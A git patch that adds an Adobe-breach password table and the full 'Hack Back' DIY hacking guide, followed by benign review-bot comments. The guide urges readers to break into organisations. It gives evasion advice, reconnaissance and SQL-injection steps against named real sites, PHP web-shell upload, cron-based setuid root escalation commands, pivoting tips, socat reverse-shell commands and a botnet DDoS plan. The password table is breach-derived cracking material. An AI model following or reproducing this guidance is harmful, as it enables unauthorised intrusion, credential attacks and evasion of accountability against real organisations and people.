From e6e3bd46c612569945bc13d31f1bdb218b6af3ab Mon Sep 17 00:00:00 2001 From: Marina von Steinkirch Date: Sat, 6 Aug 2016 12:50:04 -0700 Subject: [PATCH] Add hack back pastebin --- .DS_Store | Bin 0 -> 8196 bytes Other_Hackings/.DS_Store | Bin 8196 -> 8196 bytes Other_Hackings/useful_lists/.DS_Store | Bin 6148 -> 6148 bytes Other_Hackings/wordlists/.DS_Store | Bin 14340 -> 12292 bytes Other_Hackings/wordlists/adobe-top100.txt | 123 +++++++ Other_guides/cRYvK4jb.txt | 407 ++++++++++++++++++++++ 6 files changed, 530 insertions(+) create mode 100644 .DS_Store create mode 100644 Other_Hackings/wordlists/adobe-top100.txt create mode 100644 Other_guides/cRYvK4jb.txt diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..8516f15da552584356e0da88d9cd89d77ad74c85 GIT binary patch literal 8196 zcmeHMOK;Oa5S~o~O$d*ahd_dZk04d30fE|ENLwBfg^Hk7h(d@PlUTTRNSubKs+2Ro zfHUtae*wXb9{~S^Tlr?}RJPO50}=vdH}cMAz2EH4x1QOILqw|7sTGLM5K#sf%X|*i z9)<7oHB?ez4}%r(L>BqfzU6r9rZY5JcW4GQ1DXNNfM!55@GmfcGn-3h#JL~b)wO0o zGccA6aC|Uuu`GtNA4mxus3Zk|Oru*0+QaOz$HHwD~%Xlqji2$yP*t7x_82I>vW9lkjj zXrONi4LMrCjO+9aV_Wo;Y;uNC>U#o}#hf0-TbQ#A%zAR3)Z+vqO}FSSR-0T8Gw~|I z#3bFu$az|%J5;8{xc##F=;$LDZDS1`dI8IC!e+LFd+KqdFc(E0qb00Lf$sWq_ zCqH%QQMuuD%YN1Gv`f|2L-}UcEHi8`SN+DIec$t(-FDSnv8`?;e{$Y){i^L+tq62& z)pl!Mx8!x)T6?V==v%dGexs5P1~{kUM9<*O8)fL)}_mrr;Wnw z_O!7zcXe*sxH?zZ-p+r@WX@i=a&75BbNl7%H*ep)|M2ni7h!=^c*xO-;QMa+f)!iqFllO+`^h5dVB2>Jr)aITd2abF_jP99YWhu7+`n==c9)!-qChGcb+} zsPsa4p#;kZKRc2naIS6OdV-4!kLw3gAgClAhm>?2a`z8Iv<(bpOfi)GK%xibufGWR S)8AkE{3m_>%cJ{WSHA#-&Tt3- literal 0 HcmV?d00001 
diff --git a/Other_Hackings/.DS_Store b/Other_Hackings/.DS_Store index 5efb9590b9ca8d37f96f8990e397cbb86763c6ee..12c890765a740fb2d28b2ce5e3705e54e87fe89d 100644 GIT binary patch delta 298 zcmZp1XmOa}FUrfnz`)4BAi%(o%@EI!%#gv5%82Hwr=94s8_AQgfz8Dv#J zb}>UKLoS0Jkj|JqPe6V$zd*(0y#hUqtdqS2ofx?$_X_sQad5^9h*wt|85`>;7+Tco zC{$aTS?Va5SsK>X3T&KgC1gH1P*9SmEVw8yCqFM8Q3BLEr#O3MHM delta 270 zcmZp1XmOa}FUrlpz`)4BAi%(o#E=h!*`7K1$r}r&u}^H^-OSFx!okQr*-xNapPQk8 zp#&%&&rkz|@eJueUK&F_NOe+9eiG0Wpb?BWfb@+2Krs1`z+^_o$#Q}Ulgk8^fM(1T z?3d%@j295Et~RvLQ7|#7)lsN6G%zvJQLr#JuB{b#GTBYYeDYGEG)9)mJi@9H-;xS) zGK)(L3~n+qF|)9;v2$>8adUBlO)>zPBnmVMs2gmMnE}vDQ&TgbIXxU4(we4@zL5pB wU5gekS-NcbiUWrxM+wO@9-b^9EVkJ}=NHtHXDnw0eOr}087tGkN^Mx diff --git a/Other_Hackings/useful_lists/.DS_Store b/Other_Hackings/useful_lists/.DS_Store index 600d206ae564d96ab7493e4b170afabea422e333..c619f6a4c23743a8427e571b89afb4dde496a327 100644 GIT binary patch delta 32 mcmZoMXffE($;iEffq~&Y5HtV(zj+~J8r#GM-p%YBfB6BjDGLJt delta 32 kcmZoMXffE($;f?%fq_BeKNxIY$e6}9v4M9pJI7ys0O|)0NdN!< diff --git a/Other_Hackings/wordlists/.DS_Store b/Other_Hackings/wordlists/.DS_Store index 52852763caf8a302657702c36b026e56336112bb..0a40e0afe00b4e7c2d2b7d86e533c633c61d4db7 100644 GIT binary patch delta 225 zcmZoEXh~3DU|?W$DortDV9)?EIe-{M3-ADmb_NCo?uiQejDZsaoEar1=c$WNzNl`x z@qso!quIm>KAU+2JXnA_nBqXXCM$@^ZmtxmV%uCSJ%eSk0;9=hZiPe4q5=$w3@Hrx z3`q>B47v;@Kvn^R;p7R5Qd|sy3=FKNfO=UrA5;F!tj@ zpv}){zBxj`gN5Ti6im($lihq&q>7DSl%a?rpCOqco1qd&mrhO))|#9k!6L&t4Wbli zECT~KnxYMoQcSFmHk(KSP>BEl diff --git a/Other_Hackings/wordlists/adobe-top100.txt b/Other_Hackings/wordlists/adobe-top100.txt new file mode 100644 index 0000000..26144a7 --- /dev/null +++ b/Other_Hackings/wordlists/adobe-top100.txt 
@@ -0,0 +1,123 @@ +Top 100 Adobe Passwords with Count + +We do not (yet) have the keys Adobe used to encrypt the passwords of 130,324,429 users affected by +their most recent breach. However, thanks to Adobe choosing symmetric key encryption over hashing, +selecting ECB mode, and using the same key for every password, combined with a large number of +known plaintexts and the generosity of users who flat-out gave us their password in their password +hint, this is not preventing us from presenting you with this list of the top 100 passwords +selected by Adobe users. + +While we are fairly confident in the accuracy of this list, we have no way to actually verify it +right now. We don't have the keys, and Adobe is not letting any of the affected accounts log in +until the owners reset their passwords. So, it is possible there is an error or two in here. Caveat +emptor and such. + + + +# Count Ciphertext Plaintext +-------------------------------------------------------------- +1. 1911938 EQ7fIpT7i/Q= 123456 +2. 446162 j9p+HwtWWT86aMjgZFLzYg== 123456789 +3. 345834 L8qbAD3jl3jioxG6CatHBw== password +4. 211659 BB4e6X+b2xLioxG6CatHBw== adobe123 +5. 201580 j9p+HwtWWT/ioxG6CatHBw== 12345678 +6. 130832 5djv7ZCI2ws= qwerty +7. 124253 dQi0asWPYvQ= 1234567 +8. 113884 7LqYzKVeq8I= 111111 +9. 83411 PMDTbP0LZxu03SwrFUvYGA== photoshop +10. 82694 e6MPXQ5G6a8= 123123 +11. 76910 j9p+HwtWWT8/HeZN+3oiCQ== 1234567890 +12. 76186 diQ+ie23vAA= 000000 +13. 70791 kCcUSCmonEA= abc123 +14. 61453 ukxzEcXU6Pw= 1234 +15. 56744 5wEAInH22i4= adobe1 +16. 54651 WqflwJFYW3+PszVFZo1Ggg== macromedia +17. 48850 hjAYsdUA4+k= azerty +18. 47142 rpkvF+oZzQvioxG6CatHBw== iloveyou +19. 44281 xz6PIeGzr6g= aaaaaa +20. 43670 Ypsmk6AXQTk= 654321 +21. 43497 4V+mGczxDEA= 12345 +22. 37407 yp2KLbBiQXs= 666666 +23. 35325 2dJY5hIJ4FHioxG6CatHBw== sunshine +24. 34963 1McuJ/7v9nE= 123321 +25. 33452 yxzNxPIsFno= letmein +26. 32549 dCgB24yq9Bw= monkey +27. 31554 dA8D8OYD55E= asdfgh +28. 
28349 L8qbAD3jl3jSPm/keox4fA== password1 +29. 28303 zk8NJgAOqc4= shadow +30. 28132 Ttgs5+ZAZM7ioxG6CatHBw== princess +31. 27853 pTkQrKZ/JYM= dragon +32. 27840 2aZl4Ouarwm52NYYI936YQ== adobeadobe +33. 27720 NpVKrCM6pKw= daniel +34. 27699 Dts8klglTQDioxG6CatHBw== computer +35. 27415 4aiR1wv9z2Q= michael +36. 27387 XpDlpOQzTSE= 121212 +37. 26502 ldvmctKdeN8= charlie +38. 25341 5nRuxOG9/Ho= master +39. 24499 y7F6CyUyVM/ioxG6CatHBw== superman +40. 24372 R3jcdque71gE+R+mSnMKEA== qwertyuiop +41. 23417 TduxwnCuA1U= 112233 +42. 23157 2hD1nmJUmh3ioxG6CatHBw== asdfasdf +43. 22719 MyFBO2YW+Bw= jessica +44. 22672 cSZM/nlchzzioxG6CatHBw== 1q2w3e4r +45. 22204 Vqit1GVLLek= welcome +46. 22180 e+4n2zDarnvioxG6CatHBw== 1qaz2wsx +47. 22143 ZHgi8hFCTvrSPm/keox4fA== 987654321 +48. 22103 OrzNCxMfwrw= fdsa +49. 21795 4chDWZgI7v0= 753951 +50. 21449 vp6d18mfGL+5n2auThm2+Q== chocolate +51. 21383 4I4DOfx+UUg= fuckyou +52. 21208 Z07sabFOg5Y= soccer +53. 21100 pBqRSZNU8XU= tigger +54. 20961 WlMTLimQ5b4= asdasd +55. 20581 r/OONiXT+Ko= thomas +56. 20578 XWL3FNwnp+czgMjd+wJwNw== asdfghjkl +57. 20571 ueE89xIj8RTioxG6CatHBw== internet +58. 20331 ietF94QrMIbioxG6CatHBw== michelle +59. 20268 ecW6IyEemknioxG6CatHBw== football +60. 20022 ziypr2hyamc= 123qwe +61. 19907 7MLKr9CfrNg= zxcvbnm +62. 19825 7Z6uMyq9bpxe1EB7HijrBQ== dreamweaver +63. 19818 ZDxAirVSzvs= 7777777 +64. 19237 zkXlvHcZYOg= maggie +65. 19129 GymA1zhi51k= qazwsx +66. 19113 lVwka/Mn8TPioxG6CatHBw== baseball +67. 18969 ghrvkwCcX4bioxG6CatHBw== jennifer +68. 18879 FTeB5SkrOZM= jordan +69. 18470 eOsrbcW/PeTioxG6CatHBw== abcd1234 +70. 18177 Nz4/TI6o5RrioxG6CatHBw== trustno1 +71. 18108 wQKWOaXi5eA= buster +72. 18049 b5LJqTmQmvQ= 555555 +73. 18008 tnWjMXDBaIkzgMjd+wJwNw== liverpool +74. 17986 NtCzq/i0Ffc= abc +75. 17933 iMhaearHXjPioxG6CatHBw== whatever +76. 17717 OPQxDLW2L+DioxG6CatHBw== 11111111 +77. 17706 jAZbtIgk1cg= 102030 +78. 17581 g5pZihfzGve6cdBSCql/UQ== 123123123 +79. 17454 MEXwK6GOWHk= andrea +80. 17442 JXko2WSrc6s= pepper +81. 
17296 VATj787A2Ho= nicole +82. 17174 oa/GBGqIApo= killer +83. 17077 7eu5/SYuhng= abcdef +84. 16963 ORpiFlGkd0g= hannah +85. 16898 L3uQHNDF6Mw= test +86. 16616 kAtMKrzaD6jxHUX3hQObgQ== alexander +87. 16535 HWMCJDWy2MI= andrew +88. 16526 u5YtgXT+JKk= 222222 +89. 16468 +XW6eYb0HTg= joshua +90. 16456 WVVYjePjnX4= freedom +91. 16374 QSay9kzQVz8= samsung +92. 16177 F9nqBYx2LhA= asdfghj +93. 16091 6KJbvp1JGKY= purple +94. 16073 FcX+iulysVg= ginger +95. 15962 v0cefPH2OLI= 123654 +96. 15910 e21tszGBy4k= matrix +97. 15803 fbO2Wx232qY= secret +98. 15788 kOAk8W94ZX4= summer +99. 15752 pCVd59qFewU= 1q2w3e +100. 15637 agRGj5rtLD8= snoopy1 + + + +https://twitter.com/jmgosney +https://sagitta.pw/ diff --git a/Other_guides/cRYvK4jb.txt b/Other_guides/cRYvK4jb.txt new file mode 100644 index 0000000..a357861 --- /dev/null +++ b/Other_guides/cRYvK4jb.txt 
@@ -0,0 +1,407 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide for those without the patience to wait for whistleblowers + + +--[ 1 ]-- Introduction + +I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz +it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple +it is, and to hopefully inform and inspire you to go out and hack shit. If you +have no experience with programming or hacking, some of the text below might +look like a foreign language. Check the resources section at the end to help you +get started. And trust me, once you've learned the basics you'll realize this +really is easier than filing a FOIA request. + + +--[ 2 ]-- Staying Safe + +This is illegal, so you'll need to take same basic precautions: + +1) Make a hidden encrypted volume with Truecrypt 7.1a [0] +2) Inside the encrypted volume install Whonix [1] +3) (Optional) While just having everything go over Tor thanks to Whonix is + probably sufficient, it's better to not use an internet connection connected + to your name or address. A cantenna, aircrack, and reaver can come in handy + here. + +[0] https://truecrypt.ch/downloads/ +[1] https://www.whonix.org/wiki/Download#Install_Whonix + +As long as you follow common sense like never do anything hacking related +outside of Whonix, never do any of your normal computer usage inside Whonix, +never mention any information about your real life when talking with other +hackers, and never brag about your illegal hacking exploits to friends in real +life, then you can pretty much do whatever you want with no fear of being v&. + +NOTE: I do NOT recommend actually hacking directly over Tor. 
While Tor is usable +for some things like web browsing, when it comes to using hacking tools like +nmap, sqlmap, and nikto that are making thousands of requests, they will run +very slowly over Tor. Not to mention that you'll want a public IP address to +receive connect back shells. I recommend using servers you've hacked or a VPS +paid with bitcoin to hack from. That way only the low bandwidth text interface +between you and the server is over Tor. All the commands you're running will +have a nice fast connection to your target. + + +--[ 3 ]-- Mapping out the target + +Basically I just repeatedly use fierce [0], whois lookups on IP addresses and +domain names, and reverse whois lookups to find all IP address space and domain +names associated with an organization. + +[0] http://ha.ckers.org/fierce/ + +For an example let's take Blackwater. We start out knowing their homepage is at +academi.com. Running fierce.pl -dns academi.com we find the subdomains: +67.238.84.228 email.academi.com +67.238.84.242 extranet.academi.com +67.238.84.240 mail.academi.com +67.238.84.230 secure.academi.com +67.238.84.227 vault.academi.com +54.243.51.249 www.academi.com + +Now we do whois lookups and find the homepage of www.academi.com is hosted on +Amazon Web Service, while the other IPs are in the range: +NetRange: 67.238.84.224 - 67.238.84.255 +CIDR: 67.238.84.224/27 +CustName: Blackwater USA +Address: 850 Puddin Ridge Rd + +Doing a whois lookup on academi.com reveals it's also registered to the same +address, so we'll use that as a string to search with for the reverse whois +lookups. As far as I know all the actual reverse whois lookup services cost +money, so I just cheat with google: +"850 Puddin Ridge Rd" inurl:ip-address-lookup +"850 Puddin Ridge Rd" inurl:domaintools + +Now run fierce.pl -range on the IP ranges you find to lookup dns names, and +fierce.pl -dns on the domain names to find subdomains and IP addresses. 
Do more +whois lookups and repeat the process until you've found everything. + +Also just google the organization and browse around its websites. For example on +academi.com we find links to a careers portal, an online store, and an employee +resources page, so now we have some more: +54.236.143.203 careers.academi.com +67.132.195.12 academiproshop.com +67.238.84.236 te.academi.com +67.238.84.238 property.academi.com +67.238.84.241 teams.academi.com + +If you repeat the whois lookups and such you'll find academiproshop.com seems to +not be hosted or maintained by Blackwater, so scratch that off the list of +interesting IPs/domains. + +In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com +was simply a whois lookup of finfisher.com which found it registered to the name +"FinFisher GmbH". Googling for: +"FinFisher GmbH" inurl:domaintools +finds gamma-international.de, which redirects to finsupport.finfisher.com + +...so now you've got some idea how I map out a target. +This is actually one of the most important parts, as the larger the attack +surface that you are able to map out, the easier it will be to find a hole +somewhere in it. + + +--[ 4 ]-- Scanning & Exploiting + +Scan all the IP ranges you found with nmap to find all services running. Aside +from a standard port scan, scanning for SNMP is underrated. + +Now for each service you find running: + +1) Is it exposing something it shouldn't? Sometimes companies will have services +running that require no authentication and just assume it's safe because the url +or IP to access it isn't public. Maybe fierce found a git subdomain and you can +go to git.companyname.come/gitweb/ and browse their source code. + +2) Is it horribly misconfigured? Maybe they have an ftp server that allows +anonymous read or write access to an important directory. Maybe they have a +database server with a blank admin password (lol stratfor). 
Maybe their embedded +devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's +default password. + +3) Is it running an old version of software vulnerable to a public exploit? + + +Webservers deserve their own category. For any webservers, including ones nmap +will often find running on nonstandard ports, I usually: + +1) Browse them. Especially on subdomains that fierce finds which aren't intended +for public viewing like test.company.com or dev.company.com you'll often find +interesting stuff just by looking at them. + +2) Run nikto [0]. This will check for things like webserver/.svn/, +webserver/backup/, webserver/phpinfo.php, and a few thousand other common +mistakes and misconfigurations. + +3) Identify what software is being used on the website. WhatWeb is useful [1] + +4) Depending on what software the website is running, use more specific tools +like wpscan [2], CMS-Explorer [3], and Joomscan [4]. + +First try that against all services to see if any have a misconfiguration, +publicly known vulnerability, or other easy way in. If not, it's time to move +on to finding a new vulnerability: + +5) Custom coded web apps are more fertile ground for bugs than large widely used +projects, so try those first. I use ZAP [5], and some combination of its +automated tests along with manually poking around with the help of its +intercepting proxy. + +6) For the non-custom software they're running, get a copy to look at. If it's +free software you can just download it. If it's proprietary you can usually +pirate it. If it's proprietary and obscure enough that you can't pirate it you +can buy it (lame) or find other sites running the same software using google, +find one that's easier to hack, and get a copy from them. 
+ +[0] http://www.cirt.net/nikto2 +[1] http://www.morningstarsecurity.com/research/whatweb +[2] http://wpscan.org/ +[3] https://code.google.com/p/cms-explorer/ +[4] http://sourceforge.net/projects/joomscan/ +[5] https://code.google.com/p/zaproxy/ + + +For finsupport.finfisher.com the process was: + +* Start nikto running in the background. + +* Visit the website. See nothing but a login page. Quickly check for sqli in the + login form. + +* See if WhatWeb knows anything about what software the site is running. + +* WhatWeb doesn't recognize it, so the next question I want answered is if this + is a custom website by Gamma, or if there are other websites using the same + software. + +* I view the page source to find a URL I can search on (index.php isn't + exactly unique to this software). I pick Scripts/scripts.js.php, and google: + allinurl:"Scripts/scripts.js.php" + +* I find there's a handful of other sites using the same software, all coded by + the same small webdesign firm. It looks like each site is custom coded but + they share a lot of code. So I hack a couple of them to get a collection of + code written by the webdesign firm. + +At this point I can see the news stories that journalists will write to drum +up views: "In a sophisticated, multi-step attack, hackers first compromised a +web design firm in order to acquire confidential data that would aid them in +attacking Gamma Group..." + +But it's really quite easy, done almost on autopilot once you get the hang of +it. It took all of a couple minutes to: + +* google allinurl:"Scripts/scripts.js.php" and find the other sites + +* Notice they're all sql injectable in the first url parameter I try. 
+ +* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with + the option --tamper='tamper/modsecurityversioned.py' + +* Acquire the admin login information, login and upload a php shell [1] (the + check for allowable file extensions was done client side in javascript), and + download the website's source code. + +[0] http://sqlmap.org/ +[1] https://epinna.github.io/Weevely/ + +Looking through the source code they might as well have named it Damn Vulnerable +Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in +javascript, and if you're unauthenticated the admin page just sends you back to +the login page with a Location header, but you can have your intercepting proxy +filter the Location header out and access it just fine. + +[0] http://www.dvwa.co.uk/ + +Heading back over to the finsupport site, the admin /BackOffice/ page returns +403 Forbidden, and I'm having some issues with the LFI, so I switch to using the +sqli (it's nice to have a dozen options to choose from). The other sites by the +web designer all had an injectable print.php, so some quick requests to: +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 +reveal that finsupport also has print.php and it is injectable. And it's +database admin! For MySQL this means you can read and write files. It turns out +the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. +But I can use a short script that uses sqlmap --file-read to get the php source +for a URL, and a normal web request to get the HTML, and then finds files +included or required in the php source, and finds php files linked in the HTML, +to recursively download the source to the whole site. + +Looking through the source, I see customers can attach a file to their support +tickets, and there's no check on the file extension. 
So I pick a username and +password out of the customer database, create a support request with a php shell +attached, and I'm in! + + +--[ 5 ]-- (fail at) Escalating + + ___________ +< got r00t? > + ----------- + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || + ^^^^^^^^^^^^^^^^ + +Root over 50% of linux servers you encounter in the wild with two easy scripts, +Linux_Exploit_Suggester [0], and unix-privesc-check [1]. + +[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester +[1] https://code.google.com/p/unix-privesc-check/ + +finsupport was running the latest version of Debian with no local root exploits, +but unix-privesc-check returned: +WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user +www-data can write to /etc/cron.hourly/mgmtlicensestatus +WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data +can write to /etc/cron.hourly/webalizer + +so I add to /etc/cron.hourly/webalizer: +chown root:root /path/to/my_setuid_shell +chmod 04755 /path/to/my_setuid_shell + +wait an hour, and ....nothing. Turns out that while the cron process is running +it doesn't seem to be actually running cron jobs. Looking in the webalizer +directory shows it didn't update stats the previous month. Apparently after +updating the timezone cron will sometimes run at the wrong time or sometimes not +run at all and you need to restart cron after changing the timezone. ls -l +/etc/localtime shows the timezone got updated June 6, the same time webalizer +stopped recording stats, so that's probably the issue. At any rate, the only +thing this server does is host the website, so I already have access to +everything interesting on it. Root wouldn't get much of anything new, so I move +on to the rest of the network. + + +--[ 6 ]-- Pivoting + +The next step is to look around the local network of the box you hacked. 
This +is pretty much the same as the first Scanning & Exploiting step, except that +from behind the firewall many more interesting services will be exposed. A +tarball containing a statically linked copy of nmap and all its scripts that you +can upload and run on any box is very useful for this. The various nfs-* and +especially smb-* scripts nmap has will be extremely useful. + +The only interesting thing I could get on finsupport's local network was another +webserver serving up a folder called 'qateam' containing their mobile malware. + + +--[ 7 ]-- Have Fun + +Once you're in their networks, the real fun starts. Just use your imagination. +While I titled this a guide for wannabe whistleblowers, there's no reason to +limit yourself to leaking documents. My original plan was to: +1) Hack Gamma and obtain a copy of the FinSpy server software +2) Find vulnerabilities in FinSpy server. +3) Scan the internet for, and hack, all FinSpy C&C servers. +4) Identify the groups running them. +5) Use the C&C server to upload and run a program on all targets telling them + who was spying on them. +6) Use the C&C server to uninstall FinFisher on all targets. +7) Join the former C&C servers into a botnet to DDoS Gamma Group. + +It was only after failing to fully hack Gamma and ending up with some +interesting documents but no copy of the FinSpy server software that I had to +make due with the far less lulzy backup plan of leaking their stuff while +mocking them on twitter. +Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password +already so I can move on to step 2! + + +--[ 8 ]-- Other Methods + +The general method I outlined above of scan, find vulnerabilities, and exploit +is just one way to hack, probably better suited to those with a background in +programming. There's no one right way, and any method that works is as good as +any other. 
The other main ways that I'll state without going into detail are: + +1) Exploits in web browers, java, flash, or microsoft office, combined with +emailing employees with a convincing message to get them to open the link or +attachment, or hacking a web site frequented by the employees and adding the +browser/java/flash exploit to that. +This is the method used by most of the government hacking groups, but you don't +need to be a government with millions to spend on 0day research or subscriptions +to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit +for a couple thousand, and rent access to one for much less. There's also +metasploit browser autopwn, but you'll probably have better luck with no +exploits and a fake flash updater prompt. + +2) Taking advantage of the fact that people are nice, trusting, and helpful 95% +of the time. +The infosec industry invented a term to make this sound like some sort of +science: "Social Engineering". This is probably the way to go if you don't know +too much about computers, and it really is all it takes to be a successful +hacker [0]. 
+ +[0] https://www.youtube.com/watch?v=DB6ywr9fngU + + +--[ 9 ]-- Resources + +Links: + +* https://www.pentesterlab.com/exercises/ +* http://overthewire.org/wargames/ +* http://www.hackthissite.org/ +* http://smashthestack.org/ +* http://www.win.tue.nl/~aeb/linux/hh/hh.html +* http://www.phrack.com/ +* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot +* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash +* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ +* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers + (all his other blog posts are great too) +* https://www.corelan.be/ (start at Exploit writing tutorial part 1) +* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ + One trick it leaves out is that on most systems the apache access log is + readable only by root, but you can still include from /proc/self/fd/10 or + whatever fd apache opened it as. It would also be more useful if it mentioned + what versions of php the various tricks were fixed in. +* http://www.dest-unreach.org/socat/ + Get usable reverse shells with a statically linked copy of socat to drop on + your target and: + target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM + host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM + It's also useful for setting up weird pivots and all kinds of other stuff. + +Books: + +* The Web Application Hacker's Handbook +* Hacking: The Art of Exploitation +* The Database Hacker's Handbook +* The Art of Software Security Assessment +* A Bug Hunter's Diary +* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier +* TCP/IP Illustrated + +Aside from the hacking specific stuff almost anything useful to a system +administrator for setting up and administering networks will also be useful for +exploring them. 
This includes familiarity with the windows command prompt and unix +shell, basic scripting skills, knowledge of ldap, kerberos, active directory, +networking, etc. + + +--[ 10 ]-- Outro + +You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a +tool. It's not selling hacking tools that makes Gamma evil. It's who their +customers are targeting and with what purpose that makes them evil. That's not +to say that tools are inherently neutral. Hacking is an offensive tool. In the +same way that guerrilla warfare makes it harder to occupy a country, whenever +it's cheaper to attack than to defend it's harder to maintain illegitimate +authority and inequality. So I wrote this to try to make hacking easier and more +accessible. And I wanted to show that the Gamma Group hack really was nothing +fancy, just standard sqli, and that you do have the ability to go out and take +similar action. + +Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea +Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned +hackers, dissidents, and criminals! \ No newline at end of file
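Review bot: The new root-level `.DS_Store` (8196 bytes, binary) is macOS Finder metadata and should not be committed: it carries no project content, yields an unreviewable `GIT binary patch` hunk like the one above, and records the names of files in that directory, including any the author did not intend to publish. Remove it with `git rm --cached .DS_Store`, add `.DS_Store` to `.gitignore`, and drop the hunk from this commit.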
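Review bot: The three binary deltas to `Other_Hackings/.DS_Store`, `Other_Hackings/useful_lists/.DS_Store` and `Other_Hackings/wordlists/.DS_Store` have the same problem as the new root `.DS_Store`: they are Finder view-state churn that changes every time a directory is browsed locally, they cannot be reviewed (the wordlists one goes from 14340 to 12292 bytes with nothing a reader can inspect), and they expose local directory listings. The same `.gitignore` entry plus `git rm --cached` on each path covers all three; they should not be part of a commit whose subject is about adding a pastebin.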
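Review bot: `Other_Hackings/wordlists/adobe-top100.txt` is not in wordlist format, so its placement under `wordlists/` is misleading: it is a prose note followed by a rank/count/ciphertext/plaintext table (`1. 1911938 EQ7fIpT7i/Q= 123456`), and any tool that reads one candidate per line will ingest the preamble and all four columns as candidates. Either move it to `Other_guides/` as the reference it is, naming the author (the two trailing URLs, jmgosney and sagitta.pw) in the commit message, or derive a plain one-per-line file from the last column and keep this one alongside as the cited source. The table is also a good teaching artifact for the point its own preamble makes about ECB under a single key: rows that share a leading block share their first 8 plaintext bytes (`L8qbAD3jl3j...` for both `password` and `password1`; `j9p+HwtWWT...` for `12345678`, `123456789` and `1234567890`), the recurring trailing block `ioxG6CatHBw==` is the padding-only block appended to every exactly-8-character password (`adobe123`, `iloveyou`, `sunshine`, `internet`, ...), and `SPm/keox4fA==` closes both `password1` and `987654321` because each has `1` plus padding as its second block. Equal-length and equal-prefix passwords were therefore linkable without the key at all, which is the concrete reason password storage needs a salted, slow hash rather than reversible encryption; a one-line comment to that effect at the top of the file would make it useful as documentation and not only as a list.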
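Review bot: `Other_guides/cRYvK4jb.txt` is named after a pastebin id and carries no source URL, author handle or retrieval date anywhere in the 407 lines, so nothing in the repository says what the file is or where it came from; give it a descriptive name (`hackback-diy-guide.txt` is one suggestion) and record the source link and date either in a header line or in the commit message, which currently says only "Add hack back pastebin". The file also ends without a trailing newline (`\ No newline at end of file`), which will show up as a spurious change the next time anyone touches the last line. Since this is an archived third-party text, its typos (`take same basic precautions`, `web browers`, `make due`) should stay as they are rather than being silently edited, but the commit message should state that the copy is verbatim so a later reader does not "fix" them.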